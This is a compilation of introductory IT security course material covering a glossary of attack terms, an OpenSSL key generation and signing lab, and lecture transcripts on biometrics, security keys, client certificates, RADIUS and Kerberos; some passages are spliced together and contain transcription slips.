It Professional Security Support Module 1 Glossary: New Terms and Their Definitions: Course 5 Week 1

IT PROFESSIONAL SECURITY SUPPORT
Module 1 Glossary
New terms and their definitions: Course 5 Week 1
Adware: Software that displays advertisements and collects data
Attack: An actual attempt at causing harm to a system
Availability: Means that the information we have is readily accessible to those people that
should have it
Backdoor: A way to get into a system if the other methods to get in a system aren't allowed,
it's a secret entryway for attackers
Baiting: An attack that happens through actual physical contact, enticing a victim to do
something
Botnet: A collection of one or more Bots
Bots: Machines compromised by malware that are utilized to perform tasks centrally
controlled by an attacker
Brute force attacks: A common password attack which consists of just continuously trying
different combinations of characters and letters until one gets access
CIA Triad: Confidentiality, integrity, and availability. Three key principles of a guiding model
for designing information security policies
Confidentiality: Keeping things hidden
Cross-site scripting (XSS): A type of injection attack where the attacker can insert malicious
code and target the user of the service
Denial-of-Service (DoS) attack: An attack that tries to prevent access to a service for
legitimate users by overwhelming the network or server
Dictionary attack: A type of password attack that tries out words that are commonly used in
passwords, like password, monkey, football
Distributed Denial-of-Service (DDoS) attack: A DoS attack using multiple systems
DNS Cache Poisoning Attack: It works by tricking a DNS server into accepting a fake DNS
record that will point you to a compromised DNS server
Evil twin: The premise of an evil twin attack is for you to connect to a network that is
identical to yours but that is controlled by an attacker. Once connected to it, they will be able
to monitor your traffic
Exploit: Software that is used to take advantage of a security bug or vulnerability
Hacker: Someone who attempts to break into or exploit a system
Half-open attacks: A way to refer to SYN floods
Injection attacks: A common security exploit that can occur in software development and
runs rampant on the web, where an attacker injects malicious code
Integrity: Means keeping our data accurate and untampered with
Keylogger: A common type of spyware that's used to record every keystroke you make
Logic bomb: A type of Malware that's intentionally installed
Malware: A type of malicious software that can be used to obtain your sensitive information
or delete or modify files
Meddler in the middle (formerly known as Man in the Middle): An attack that places the
attacker in the middle of two hosts that think they're communicating directly with each other
Password attacks: Utilize software like password crackers that try and guess your password
Phishing attack: It usually occurs when a malicious email is sent to a victim disguised as
something legitimate
Ping flood: It sends tons of ping packets to a system. If a computer can't keep up with this,
then it's prone to being overwhelmed and taken down
Ransomware: A type of attack that holds your data or system hostage until you pay some
sort of ransom
Risk: The possibility of suffering a loss in the event of an attack on the system
Rogue Access Point (AP) Attack: An access point that is installed on the network without the
network administrator's knowledge
Rootkit: A collection of software or tools that an admin would use
Screen lock: A security feature that helps prevent unwanted access by creating an action you
have to do to gain entry
Session hijacking (cookie hijacking): A common meddler in the middle attack
Social engineering: An attack method that relies heavily on interactions with humans instead
of computers
Spear phishing: Phishing that targets individual or group - the fake emails may contain some
personal information like your name, or the names of friends or family
Spoofing: When a source is masquerading around as something else
Spyware: The type of malware that's meant to spy on you
SQL Injection Attack: An attack that targets the entire website if the website is using a SQL
database
SYN flood: The server is bombarded with SYN packets
Tailgating: Gaining access into a restricted area or building by following a real employee in
Threat: The possibility of danger that could exploit a vulnerability
Trojan: Malware that disguises itself as one thing but does something else
Viruses: The best known type of malware
Vulnerability: A flaw in the system that could be exploited to compromise the system
Worms: They are similar to viruses except that instead of having to attach themselves onto
something to spread, worms can live on their own and spread through channels like the
network
0-Day Vulnerability (Zero Day): A vulnerability that is not known to the software developer
or vendor, but is known to an attacker
Creating/inspecting key pair, encrypting/decrypting and
sign/verify using OpenSSL
1 hourFree
Introduction
In this lab, you'll learn how to generate RSA private and public key pairs using the
OpenSSL utility.
OpenSSL is a commercial-grade utility toolkit for Transport Layer Security (TLS) and
Secure Sockets Layer (SSL) protocols. It's also a general-purpose cryptography library.
OpenSSL is licensed under an Apache-style license, which means that you're free to get
it and use it for commercial and non-commercial purposes (subject to some simple
license conditions).
What you'll do
 OpenSSL: You'll explore what generating key pairs looks like using OpenSSL.
 Encrypt and decrypt: You'll use the key pair to encrypt and decrypt some small amount
of data.
 Verify: You'll use the key pair to sign and verify data to ensure its accuracy.
Start the lab
You'll need to start the lab before you can access the materials. To do this, click the
green “Start Lab” button at the top of the screen.
After you click the “Start Lab” button, you will see a shell, where you will be performing
further steps in the lab. You should have a shell that looks like this:
Generating keys
Before you can encrypt or decrypt anything, you need a private and a public key, so let's
generate those first!
Generating a private key
Remember, a key pair consists of a public key that you can make publicly available, and
a private key that you need to keep secret. Shhhh. :) When someone wants to send you
data and make sure that no one else can view it, they can encrypt it with your public key.
Data that's encrypted with your public key can only be decrypted with your private key, to
ensure that only you can view the original data. This is why it's important to keep private
keys a secret! If someone else had a copy of your private key, they'd be able to decrypt
data that's meant for you. Not good!
First, let's generate a 2048-bit RSA private key, and take a look at it. To generate the key,
enter this command into the terminal:
openssl genrsa -out private_key.pem 2048

Copied!
content_copy
You should see the following output (or something very similar) :
Generating RSA private key, 2048 bit long modulus (2 primes)

................+++++
..........................................+++++
e is 65537 (0x010001)
This command creates a 2048-bit RSA key, called "private_key.pem". The name of the
key is specified after the "-out" flag, and typically ends in ".pem". The number of bits is
specified with the last argument. To view your new private key, use "cat" to print it to the
screen, just like any other file:
cat private_key.pem
Copied!
content_copy
The contents of the private key file should look like a large jumble of random characters.
This is actually correct, so don't worry about being able to read it:
-----BEGIN RSA PRIVATE KEY-----

MIIEowIBAAKCAQEA4kNMSmssCSYbOnq/UAHGH5xx9gjZaOiST3JQQtJO11L/YeBO
8DOHc7UawNADA/XDBAnGZih1M8T1PGc6Vk5SW2Lb8FMf9zG2XhYpCACFFPJAW00q
s4s1JesdugOprHZ8Jmm/QJl4KuCjlY/XdviCvcbxROIQ2mglR8nW1QWrhECQNBfo
dRSuTwmW3qBSW/Xd5pmTpP4GHCyUfRO9YCF/tZYtVMYg4FOqdGaTHRZbs6peMV4D
lSjZHDonnsGK0UJpxQNbtJEcG7vr7Vl8ziVWY5RUDND7nZYlQlbqxvvqbPPt+px3
4pAZ58eyOqeAmYBc8mwNoXp4YrC2deFng7zrKwIDAQABAoIBAB6SR0Ga33VQ/8bU
BPtzceidg8xhf7asDfDMGkodDmgLn9QCscfEvp2Er9uzf2TOlQ37oCH3f3aCOzxx
GjHFHV2Zquv630vQHLrztZGOOG0PGmD7uTRPL9wyu26BxjA2RioOibfZxKHOfmvb
5pn9k/S+Z6UOAobwIXFktTFNNdKFgalax813FlxFfmmoOC8kE30W6mP6iecP+ojm
xf577RhwR+PdE5zNNvm2F8j5ZWP39pboX7e3eYUCsEyPmVu1MSMTXrHHg6KNhCty
Qu1JfrAaisch+6vrAzfuP7t0WiILzieQgZzFDpI9HziwwOtCw+EKQhHCOPurWcO6
ByZUBzkCgYEA9aEprwqutbXB5H3QinxqXLInAH+wy8oTAMS6nV1sisIos6dD3CLO
u2fLRegv8PEUopASnzyv5PWU/iS+VJjdBCco59hmwW+7CVpaOJXlJ1qpznPVJmyx
pWsinM9Ug23GDd/jd61yKux22773RSGCYs9N7FVww5WYcDlWHLUFPk0CgYEA69DQ
h2iFuDSPonG8GPS6hf/KVRQaJZqGAINCk/2txTWmaz9VPdWT25+rxBzIoQOYAC4P
NjPHo/gJLrO/y6X6lAKBCje/Otb9E7GZwH0pFc7MxtQVR4ik6/7To3ancXNmawHe
owWZHDBRK+Ot33nZ+tYvAq48zE7rxNxsctZ9O1cCgYASsd12UR3S/q5vMZQ5thZy
T6zgQNe36v1fRZneeEnWlch7Q/PKQWvyn4e9Hlrnv7GOXeDM9dV9W6OnZCyIS8om
ksRuQO4xMsvNfm73d5ElWaUq7W3/qq4qpOjRfoY0Kpq0W6H4bd8OnUi+mN5BCLff
xV9s6WPXvv8HK5X+QVjQ0QKBgBrMqGY7IrdEge5cLpxHc8s2vq/ckPwlC4WTZUWc
VttKtZcKo41bcGpNQyAOhV6HIgcjNOdcCxw/XAvKsclbG5cmkbOvkjQFqs1KKccO
clTgI7WU9LYkeVm4pCS3n1/tVX5jwAGW6Uei1ha+0UvMdVFkdgM/+fjeHz1IL6r9
ZU4RAoGBALi33UjlJUYVMXPZc/JyFk8yyvRpYMRhmW7mQxR8gx0i1rNolPSccRkj
3NO+e1k86yyk3RsqBdixGKYDp2JqS+Aj7eHlxvUcrCAnpk9l96q8yuhQ4mJUWqs7
/hW6bxUPjDZ9BxprGZRL4ZLgPL+6C4Q4rE8TZu/5qQYDIy+ab03t
-----END RSA PRIVATE KEY-----
Head's up: Your private key will look similar to this, but it won't be the same. This is
super important, because if openssl was generating the same keys over and over, we'd
be in serious trouble!
Click Check my progress to verify the objective.
Generate private key

Check my progress
Generating a public key
Now, let's generate the public key from the private key, and inspect that one, too. Now
that you have a private key, you need to generate a public key that goes along with it.
You can give that to anyone who wants to send you encrypted data. When data is
hashed using your public key, nobody will be able to decrypt it unless they have your
private key. To create a public key based on a private key, enter the command below.
You should see the following output:
openssl rsa -in private_key.pem -outform PEM -pubout -out public_key.pem

Copied!
content_copy
writing RSA key

You can view the public key in the same way that you viewed the private key. It should
look like a bunch of random characters, like the private key, but different and slightly
shorter:
cat public_key.pem
Copied!
content_copy
-----BEGIN PUBLIC KEY-----

MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA4kNMSmssCSYbOnq/UAHG
H5xx9gjZaOiST3JQQtJO11L/YeBO8DOHc7UawNADA/XDBAnGZih1M8T1PGc6Vk5S
W2Lb8FMf9zG2XhYpCACFFPJAW00qs4s1JesdugOprHZ8Jmm/QJl4KuCjlY/XdviC
vcbxROIQ2mglR8nW1QWrhECQNBfodRSuTwmW3qBSW/Xd5pmTpP4GHCyUfRO9YCF/
tZYtVMYg4FOqdGaTHRZbs6peMV4DlSjZHDonnsGK0UJpxQNbtJEcG7vr7Vl8ziVW
Y5RUDND7nZYlQlbqxvvqbPPt+px34pAZ58eyOqeAmYBc8mwNoXp4YrC2deFng7zr
KwIDAQAB
-----END PUBLIC KEY-----
Head's up: Like your private key, your public key will look different than the one in this
image.
Now that both of your keys have been created, and you can start using them to encrypt
and decrypt data. Let's dive in!
Generate public key

Check my progress
Encrypting and decrypting
You'll simulate someone encrypting a file using your public key and sending it to you,
which allows you (and only you!) to decrypt it using your private key. Similarly, you can
encrypt files using other people's public keys, knowing that only they will be able to
decrypt them.
You'll create a text file that contains some information you want to protect by encrypting
it. Then, you'll encrypt and inspect it. To create the file, enter the command below. It will
create a new text file called "secret.txt" which just contains the text, "This is a secret
message, for authorized parties only". Feel free to change this message to anything
you'd like.
echo 'This is a secret message, for authorized parties only' > secret.txt
Copied!
content_copy
Then, to encrypt the file using your public key, enter this command:
openssl rsautl -encrypt -pubin -inkey public_key.pem -in secret.txt -out

secret.enc
Copied!
content_copy
This creates the file "secret.enc", which is an encrypted version of "secret.txt". Notice
that if you try to view the contents of the encrypted file, the output is garbled. This is
totally normal for encrypted messages because they're not meant to have their contents
displayed visually.
Here's an example of what displaying the encrypted file "secret.enc" looks like in the
nano editor using the following command below:
nano ~/secret.enc
Copied!
content_copy
Output:
^? < e ^@vmD ^B% r*M o^R Ô 8 X { ^\(^B ^}= 1i T 9~ ^RT^\^Px ^T^l

n ^G Ô î iN (W [ ^$
â^d~m , d Tq L < J ^Q bdQ
=Q R[^kT ^G iq GG ^T { UZ^dV8Â ^~O#koj^N^^ K vT Ô3 ^TnôP^l^Pa
û3^G^Nî0=c{ ^tR09 o@^d$
 
 
 
 
 
 
 
^G Get Help Ô Write Out ^W Where Is ^K Cut Text ^J Justify ^C Cur
Pos
^X Exit ^R Read File ^\ Replace Û Uncut Text ^T To Spell ^_ Go To
Line
To exit from the nano editor, use the command Ctrl-X.
The encrypted file will now be ready to send to whoever holds the matching private key.
Since that's you, you can decrypt it and get the original contents back. Remember that
we must use the private key to decrypt the message, since it was encrypted using the
public key. Go ahead and decrypt the file, using this command:
openssl rsautl -decrypt -inkey private_key.pem -in secret.enc

Copied!
content_copy
This will print the contents of the decrypted file to the screen, which should match the
contents of "secret.txt":
This is a secret message, for authorized parties only

Encrypting and decrypting

Check my progress
Creating a hash digest
Now, you'll create a hash digest of the message, then create a digital signature of this
digest. Once that's done, you'll verify the signature of the digest. This allows you to
ensure that your message wasn't modified or forged. If the message was modified, the
hash would be different from the signed one, and the verification would fail.
To create a hash digest of the message, enter this command:
openssl dgst -sha256 -sign private_key.pem -out secret.txt.sha256

secret.txt
Copied!
content_copy
This creates a file called "secret.txt.sha256" using your private key, which contains the
hash digest of your secret text file.
With this file, anyone can use your public key and the hash digest to verify that the file
hasn't been modified since you created and hashed it. To perform this verification, enter
this command:
openssl dgst -sha256 -verify public_key.pem -signature secret.txt.sha256

secret.txt
Copied!
content_copy
This should show the following output, indicating that the verification was successful
and the file hasn't been modified by a malicious third party:
Verified OK
If any other output was shown, it would indicate that the contents of the file had been
changed, and it's likely no longer safe.
Sign and verify

Check my progress
Conclusion
Wohoo! You've successfully used openssl to create both a public and a private key. You
used them to practice file encryption and decryption, and to create and verify digital
hashes.
End your lab

When you have completed your lab, click End Lab. Qwiklabs removes the resources
you’ve used and cleans the account for you.
You will be given an opportunity to rate the lab experience. Select the applicable number
of stars, type a comment, and then click Submit.
The number of stars indicates the following:
 1 star = Very dissatisfied

 2 stars = Dissatisfied
 3 stars = Neutral
 4 stars = Satisfied
 5 stars = Very satisfied
You can close the dialog box if you don't want to provide feedback.
For feedback, suggestions, or corrections, please use the Support tab.
Introduction
In this lab, you'll have hands-on practice demonstrating hashing and hash verification
using md5sum and shasum tools.
Md5sum is a hashing program that calculates and verifies 128-bit MD5 hashes. As with
all hashing algorithms, theoretically, there's an unlimited number of files that will have
any given MD5 hash. Md5sum is used to verify the integrity of files.
Similarly, shasum is an encryption program that calculates and verifies SHA hashes. It's
also commonly used to verify the integrity of files.
In this lab, you'll see that almost any change to a file will cause its MD5 hash or SHA
hashes to change.
What you'll do
 Compute:You'll create a text file and generate hashes using the md5sum and shasum
tools.
 Inspect:After you generate the hash digests, you'll inspect the resulting files.
 Verify:You'll verify the hash using the md5sum and shasum tools.
 Modify:You'll modify the text file and compare these results to the original hash to
observe how the digest changes and how the hash verification process fails.
Start the lab
You'll need to start the lab before you can access the materials. To do this, click the
green “Start Lab” button at the top of the screen.
After you click the “Start Lab” button, you will see a shell, where you will be performing
further steps in the lab. You should have a shell that looks like this:
MD5
The other category of multi-factor authentication is biometrics, which has gained in popularity in recent
years, especially in mobile devices. Biometric authentication is the process of using unique physiological
characteristics of an individual to identify them. By confirming the biometric signature, the individual is
authenticated. A very common use of this in mobile devices,is fingerprint scanners to unlock phone. This
works by registering your fingerprints first using an optical sensor that captures images of the unique
pattern of your fingerprint. Much like how passwords should never be stored in plain text,
biometric data used for authentication, so it also never be stored directly. This is even more important for
handling biometric data. Unlike passwords, biometrics are an inherent part of who someone is, so
there are privacy implications to theft or leaks of biometric data.
Biometric characteristics can also be super difficult to change in the event that they're compromised,
unlike passwords. So instead of storing the fingerprint data directly, the data is run through a hashing
algorithm, and the resulting unique hash is stored. One advantage of biometric authentication over
knowledge or token-based systems, is that it's more reliable to identifying individual for
authentication since biometric features aren't usually shareable.
For example, you can't give your friend your fingerprints so that they can log in as you, well, you would
hope not, anyway.
But as schools start to introduce fingerprint-based attendance recording systems, students are finding
ways to trick the system.They're creating fake fingerprints using things like glue allowing friends to mark
each other as present if they're late or if they skip school. This is harder to achieve than sharing a password
but it's sort of ingenious of these kids to think up. They really go the extra mile to skip school these days,
not that I'm condoning this behavior. Other biometric systems use features like iris scans,
facial recognition, gate detection and even voice. Microsoft developed the biometric authentication system
for Windows 10 called Windows Hello, which supports fingerprint identification, iris identification and
facial recognition. It uses two cameras, one for color and one for infrared, which allows for depth
detection. This way it's not possible to trick the system using a print out of an authorized user's face.
An evolution of physical tokens, is the U2F or universal second factor, it's a standard developed jointly by
Google, Yubico, and NXP Semiconductors. The finalized standard for U2F are being hosted by the FIDO
Alliance. U2F incorporates a challenge response mechanism along with public key cryptography to
implement a more secure and more convenient second factor authentication solution.
U2F tokens are referred to as security keys and are available from a range of manufacturers.
Security keys are essentially small embedded crypto processors that have secure storage of asymmetric
keys, and additional slots to run embedded code. Let's do a quick rundown on how exactly security keys
work and how their improvement over an OTP solution. The first step is registration, since the security key
must be registered with a site or service. At registration time, the security key generates a private public
key pair unique to that site and submits the public key to the site for registration, it also binds the identity
of the site with the key pair. The reason for unique key pairs for each site is for privacy reason. if a site is
compromised, this prevents cross referencing registered public keys and discovering commonalities
between sites based on registration data. Once registered with the site, the next time you're prompted to
authenticate, you'll be prompted for your user name and password as usual.
But afterwards you'll be prompted to tap your security key. When you physically tap the security key, it's a
small check for user presence to ensure malware can't authenticate on your behalf without your
knowledge.
This tap will unlock the private keys stored in the security key which is used
to authenticate.
The authentication happens as a challenge response process which protects
against replay attacks.
This is because the authentication session can't be used again later
by an eavesdropper, because the challenge and
resulting response will be different with every authentication session.
What happens is the site generates a challenge, essentially some randomized
data, and sends this to the client that's attempting to authenticate.
The client will then select the private key matching this site, and
use this key to sign the challenge, and send the signed data back.
The site can now verify the signature using the public key that was
registered earlier, if the signature checks out, the user is authenticated.
From a security perspective, this is a much more secure design than OTPs.
This is because the authentication flow is protected from phishing attacks given
the interactive nature of the process.
Security keys are also resistant to cloning or forgery because they have
unique embedded secrets on them and are protected from tampering.
From the convenience perspective,
this is a much nicer authentication flow compared to OTPs, since the user doesn't
have to manually transcribe a string of numbers into the authentication dialog.
All they have to do is tap their security key, nice and easy.
As an IT support specialist, you may come across multi-factor authentication setups
that you'd be responsible for supporting,
you might even be tasked with helping to implement one.
So it's important to understand how they provide enhanced account protection along
with the options that are available.
Physical Privacy and Security Components

Physical privacy and security
In this reading, you will learn more about physical privacy and security, including biometric and Near Field
Communication authentication. You will also revisit the “confidentiality” aspect of the CIA Principle
(Confidentiality, Integrity, Availability), which was introduced previously in this certificate program.
CIA Principle: Confidentiality
Preventing unauthorized access to an organization’s data and networks is imperative in protecting a

company’s information systems. Regulations, standards, and laws may also require that certain
information be kept confidential, like health records. Failing to ensure the confidentiality of specific types
of data could result in damage to reputation, loss of customers, liability lawsuits, financial losses, penalty
fines, criminal charges, and more. It is vital for IT Support specialists to take all measures possible to
protect confidential information.
In a previous video, you learned about three types of authentication methods:
 Something you know - password or pin number

 Something you have - bank card, USB device, key fob, or OTP (one-time password)
 Something you are - biometric data, like a fingerprint, voice signature, facial recognition, or retinal
scan
You will learn more about biometrics in this reading, along with two additional categories of
authentication methods:
 Somewhere you are - geofencing, GPS, Indoor Positioning Systems (IPS)

 Something you do - gestures, swipe patterns, CAPTCHA, or patterns of behavior
Some authentication technologies inherently require two factors:
 Somewhere you are + Something you have - Near Field Communication (NFC) uses both proximity
to an NFC scanner and a device like an NFC-enabled smartphone or an RFID chip on an employee
ID or bank card.
Something you are: Biometrics
Biometric authentication occurs in two steps: enrollment and authentication. Enrollment happens when
the user provides their biometric data for the first time through a hardware scanner. Specific features of
that biometric data are extracted, encrypted, and stored, often in a database or on a personal mobile
device. Authentication, as the second step, happens when a user presents their biometric data again to the
scanner to gain access to the secured item. This new scan is compared against the original stored
biometric data to authenticate the person’s identity.
Fingerprint scanning
In a previous video, you learned about fingerprint scanners as an authentication method for mobile
devices. Fingerprint scanners use small capacitive cells that are engineered to detect fingerprint ridges.
Dirt and moisture can interfere with the scanner’s ability to do its job. As an IT Support specialist, you may
need to replace damaged fingerprint scanners on customer devices.
Facial recognition
Many smartphone models provide the hardware and software to use facial recognition as a biometric
authentication method. This often requires two cameras. The first camera uses normal color photography.
The second camera uses infrared technology to measure depth and ensure your face is 3-dimensional. This
prevents hackers from using photographs of the authorized users to unlock mobile devices.
Iris and Retinal scanning

Iris scanning is not a secure form of biometric authentication because a photograph of the user’s iris can be
used to gain access. In contrast, retinal scanning is one of the more secure forms of biometric
authentication. It is exceedingly difficult to impersonate the retinal features of a person’s eye. Our retinas
have unique and complex patterns in how our blood vessels are arranged. These fingerprint-like patterns
can be scanned by shining a beam of infrared light into the eye. Note that eye injuries and medical
problems with the eyes can change retinal blood vessel patterns and cause users to be denied access to
their devices. Although retinal scanning is secure, the technology can be expensive and difficult to
implement.
Somewhere you are: Geolocation
The geographical location of a user can serve as one part of a multi-factor authentication policy or to deny
access to users based on their locations. Geolocation services can use GPS, IP ranges, WiFi access points,
cell phone towers, and/or Bluetooth beacons to estimate a mobile user’s location.
Geofencing
Geofencing is used to authenticate users who are physically within a certain radius of a specific location.
For example, if you order food using McDonald’s smartphone app, the restaurant will not process your
order until your smartphone is within a certain radius of the restaurant. You cannot send someone else to
pick up your order either, as that person cannot authenticate without your smartphone being within the
geofencing radius.
Global Positioning Systems (GPS)

Global Positioning Systems (GPS) use satellites orbiting Earth to map a device's longitude and latitude. The
mobile device needs to be equipped with GPS sensors and have GPS services enabled to take advantage of
GPS-based authentication technologies. GPS could be used to authenticate a device based on the physical
location of the user. Insurance companies use GPS data to verify the authenticity of disaster claims filed
through mobile apps.
Indoor Positioning Systems (IPS)

Indoor Positioning Systems (IPS) triangulate a device’s location by using WiFi access points, cell phone
towers, and/or Bluetooth beacons. Users must grant permission to apps to use this technology. IPS
locations might be used to deny network access when the user has entered a restricted area.
Near-field communication (NFC) and scanners

You may have interacted with a near-field communication (NFC) scanner by using contactless payments
with a credit card, bank card, or smartphone. NFC technology can also be used for authentication and
access to physical buildings through school or employment ID cards.
NFC transmits on the same frequency as high frequency RFID (13.56 MHz) and has a short distance range of
10 centimeters. The short distance range provides some protection from hackers attempting to intercept
the connection to obtain your credit card information. However, NFC is not fully secure. An innocuous
looking NFC scanner sitting next to an NFC-enabled payment device could record all NFC transactions that
occur within the 10 cm of the device in a “man in the middle” security breach.
Something you do: Gestures and Behaviors
You may already be familiar with using gestures like swipe patterns to unlock a smartphone. Another
gesture-based authentication method is the Picture Password, which requires the user to touch specific,
secret points on a photograph to unlock the device.
Patterns of people’s behaviors can be used to authenticate identity. For example, an organization might
keep track of computer system login and logout times of employees. These patterns could be monitored
for any unusual changes in employee behavior, which may indicate that the “employee” is instead an
imposter.
Turing tests are used to determine if an unknown entity is a human or a machine. You have probably
responded to a CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart)
to authenticate that you are indeed a human and not a bot. This is accomplished by asking the user to
identify items within a set of photographs. Photos are used for this test because images are more difficult
for bots to identify than text.
Key takeaways
There are a variety of MFA protocols that can be implemented to protect the confidentiality, privacy, and
security of data and networks. The 5 types of authentication can be categorized as:
1. Something you know - password or pin number

2. Something you have - bank card, USB device, key fob, or OTP (one-time password)
3. Something you are - biometric data, like a fingerprint, voice signature, facial recognition, or retinal
scan
4. Somewhere you are - geolocation, geofencing, GPS, Indoor Positioning Systems (IPS), NFC
scanning
5. Something you do - gestures, swipe patterns, CAPTCHA, or patterns of behavior
Resources for more information
For more information about methods of authentication to protect data, please visit:
 Geolocation—The Risk and Benefits of a Trending Technology - Discusses impacts, benefits, risks,
risk mitigation, security, governance, and privacy concerns of geolocation technologies.
 Understanding The 5 Factors Of Multi-Factor Authentication - Overview of the 5 Factors:
Something you know, Something you have, Something you are, Somewhere you are, and
Something you do.
 Homeland Security Biometrics - History and use cases of biometrics for maximum security and
identification of criminals in the United States Departments of Homeland Security, Defense,
Justice, and Commerce, as well as the National Institute of Standards and Technology.
 A Review on Authentication Methods - Informative peer-reviewed journal article on authentication
methods.
 Modern Authentication Methods: A Comprehensive Survey - Peer-reviewed journal article with
expanded coverage of two-factor and multi-factor authentication topics. Provides comprehensive
comparisons of advantages and disadvantages of each authentication method.
 What is the Difference Between NFC and RFID? - A comparison of NFC and RFID technologies.
 Fingerprint Reader Replacement Guide - Provides photos of internal fingerprint scanner hardware
parts, as well as instructions on how to replace a fingerprint scanner on a laptop.
Supplemental Reading for Authentication

They’re creating fake fingerprints using things like glue, allowing friends to mark each
other as present if they’re late or skip school.
As we learned earlier, certificates are public keys that are signed by
a certificate authority or CA as a sign of trust.
We covered TLS server certificates but there can also be client certificates.
These operate very similarly to server certificates but
are presented by clients and allow servers to authenticate and verify clients.
As an IT support specialist, it's important for
you to understand client certificates and certificate based authentication since you
might encounter these in the course of your career.
It's not uncommon for VPM systems or
enterprise Wi-Fi setups to use client certificates for authentication.
So understanding how they work will help you troubleshoot issues.
In order to issue client certificates, an organization must setup and
maintain CA infrastructure to issue and sign certificates.
Part of certificate authentication also involves the client authenticating
the server, giving us mutual authentication.
This is a positive sense, the client can verify that it's talking
to the real authentication server and not an impersonator.
In this case, all clients that are using certificate authentication would also
need to have the CA certificate in their certificate trust store.
This establishes trust with the CA and allows the client to verify it's talking
to the real server when trying to authenticate.
Certificate authentication is like presenting identification at the airport,
you show your ID or your certificate to prove who you are.
The ID is checked to see if it was issued by an authority that is trusted
by the verifier.
Was it issued by a government entity or is it a novelty license from a gift shop?
Obviously, one of those ideas would be accepted at the airport,
similar to a certificate being signed by a trusted CA.
When you're at the airport, the expiration date on your ID will also be checked to
ensure it's still valid, same thing applies to certificate authentication.
Although the certificates have two dates that need to be verified,
not valid before and not after.
Not valid before is checking if the certificate is valid yet,
since it's possible to have certificates issued for future use.
Not valid after is a straightforward expiration date after which
the certificate is no longer valid.
Airport authorities also have a list of specific IDs that are flagged,
if your ID is on that list, then you'll be rejected for air travel.
Similarly, the certificate will be checked against the revocation list or a CRL.
This is a signed list published by the CA,
which defines certificates that have been explicitly revoked.
One last step that's performed as part of the authentication server verification
process is to prove possession of the corresponding private key,
since the certificate has a signed public key.
If we don't prove possession, there's nothing stopping an attacker from copying
the certificate since it's not considered secret and pretending to be the owner.
To avoid this,
possession of the private key is verified through a challenge response mechanism.
This is where the server request a randomized bit of data to be signed,
using the private key corresponding to the public key presented for authentication.
This is similar to how the airport checks the photo on your ID,
to make sure you look like the person in the photo and aren't Impersonating them.
RADIUS or remote authentication dial in user service is

a protocol that provides AAA services for users on a network.
It's a very common protocol used to manage access to internal networks,
WiFi networks, email services and VPN services.
Originally designed to transport authentication information for
remote dial up users.
It's evolved to carry a wide variety of standard authentication protocols EAP or
extensible authentication protocol.
While it's unlikely that you'd be responsible for
configuring RADIUS server as an IT support specialist, you might be
supporting clients that authenticate against a RADIUS back end server.
In those cases, it's good to understand what role the RADIUS server plays in this
authentication scenario.
So you're better prepared to troubleshoot issues that may come up, clients who want
to authenticate to a RADIUS server don't directly interact with it.
Instead, when a client wants to access a resource that's protected,
the client will present authentication credentials to an S.
Or network access server which will relay the credentials to the RADIUS server.
The RADIUS server will then verify the credentials using a configured
authentication scheme.
RADIUS servers can verify user authentication information stored in
a flat file or can plug into external sources like sequel databases,
Eld app, Kerberos or active directory.
Once the RADIUS server has evaluated the user authentication request.
It replies with one of three messages, access,
reject access challenge or access except
Kerberos, is a network authentication protocol that uses tickets to

allow entities to prove their identity over potentially insecure
channels to provide mutual authentication.
It also uses symmetric encryption to protect protocol messages from
eavesdropping and replay attacks.
The name Kerberos is taken from the greek mythical character of the same name,
a three headed guard dog protecting the gates to Hades the underworld.
Seems like an appropriate choice for an authentication protocol, don't you think.
Kerberos was originally developed at the Massachusetts Institute of Technology
in the US.
And was published in the 1980s as version four.
Years later in 1993 Version 5 was published.
Today, Kerberos supports AES encryption and
implements check sums to ensure data integrity and confidentiality.
When joined to a Windows Domain, Windows 2000 and
newer versions will use Kerberos as the default authentication protocol.
Microsoft also implemented their own Kerberos service,
with some modifications to the open protocol.
Like the addition of the RC4 stream cipher, we mentioned tickets earlier,
which is a sort of token that proves your identity.
They can be used for authenticating to services,
protected using Kerberos or in other words are within the Kerberos realm.
The authentication tickets let users authenticate two services without
requiring user name and password authentication, for
every service individually.
A ticket will expire after some time, but has provisions for
automatic transparent renewal of the ticket.
Let's run down the details of how the Kerberos protocol operates.
First, a user that wants to authenticate, enters their user name and
password on their client machine.
Their Kerberos client software, will then take the password and
generate a symmetric encryption key from it.
Next, the client sends a plain text message to the Kerberos AS or
authentication server which includes the user ID of the authenticating user.
The password or secret key derived from the password aren't transmitted.
The AS uses the user ID to check if there's an account in
the authentication database, like an active directory server.
If so the AS will generate the secret key using the hashed
passwords stored in the key distribution center server.
The AS will then use the secret key to encrypt and
send a message containing the client TGS session key.
This is a secret key used for encrypting communications, with the ticket
granting service or TGS, which is already known by the authentication server.
The AS also sends a second message, with a ticket granting ticket or
a TGT, which is encrypted using the TGS secret key.
The ticket granting ticket has information like the client ID,
Ticket validity period and the client ticket granting service session key.
So the first message can be decrypted using the shared
secret key derived from the user password.
It then provides the secret key,
that can decrypt the second message giving the client a valid ticket granting ticket.
Now, the client has enough information to authenticate with the ticket granting
server.
Since the client has authenticated and received a valid ticket granting ticket,
it can use the ticket granting ticket,
to request access to services from within the Kerberos realm.
This is done by sending a message to the ticket granting service,
with the encrypted ticket granting ticket received from the AS earlier,
along with the service name or ID the client is requesting access to.
The client also sends a message,
containing an authenticator which has the client ID and a time stamp,
that's encrypted with the client ticket granting ticket session key from the AS.
The ticket granting service decrypt the ticket granting ticket,
using the ticket granting service secret key.
Which provides the ticket granting service,
with the client ticket granting service session key.
It then uses the key, to decrypt the authenticator message.
Next it checks the client ID of these two messages to ensure they match.
If they do, it sends two messages back to the client.
The first one, contains the client to server ticket which is comprised of
the client ID, client address, validity period and
the client server session key, encrypted using the services Secret key.
The second message, contains the client server session key itself and
is encrypted using the client ticket granted service session key.
Finally, the client has enough information to authenticate itself to
the service server or SS.
The client sends two messages to the SS, the first message is the encrypted client
to server ticket, received from the ticket granting service.
The second, is a new authenticator with the client ID and
timestamp encrypted using the client server session key.
The SS decrypt the first message,
using its secret key which provides it with the client server session key.
The key is then used to decrypt the second message and it compares the client ID in
the authenticator to the one included in the client to server ticket.
If these ideas match, then the ss sends a message containing the timestamp from
the client supplied authenticator,
encrypted using the client server session key.
The client then decrypt this message and
checks at the timestamp is correct authenticating the server.
If this all succeeds,
then the server grants access to the requested service on the client.
Wow, okay are you with me, I know that was a lot.
Kerberos has received some criticism because it's a single monolithic service.
This creates a single point of failure danger, if the Kerberos service goes down,
new users won't be able to authenticate and log in.
